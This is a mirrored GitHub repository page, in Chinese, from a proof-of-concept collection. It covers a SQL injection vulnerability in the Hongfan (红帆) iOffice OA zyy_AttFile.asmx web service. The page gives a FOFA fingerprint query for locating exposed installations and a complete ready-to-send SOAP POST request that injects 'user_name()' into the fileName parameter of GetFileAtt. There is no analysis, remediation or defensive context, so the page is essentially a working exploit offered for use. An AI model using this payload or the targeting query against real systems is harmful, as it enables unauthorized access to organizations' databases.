POC/红帆OA zyy_AttFile.asmx SQL注入漏洞.md at 3902884fc09960b4352f8979833f954f74b19421

admin/POC

Fork 0

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 14:04:06 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

663 B

Raw Blame History

红帆OA zyy_AttFile.asmx SQL注入漏洞

fofa

app="红帆-ioffice"

poc

POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
Host: 10.250.250.5
Content-Length: 383
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetFileAtt"
Accept-Encoding: gzip, deflate
Connection: close

<?xml version="1.0" encoding="utf-8"?><soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
xmlns="http://tempuri.org/"><fileName>1231=user_name()</fileName></GetFileAtt> </soap:Body></so
ap:Envelope>

663 B Raw Blame History

红帆OA zyy_AttFile.asmx SQL注入漏洞

fofa

poc

663 B

Raw Blame History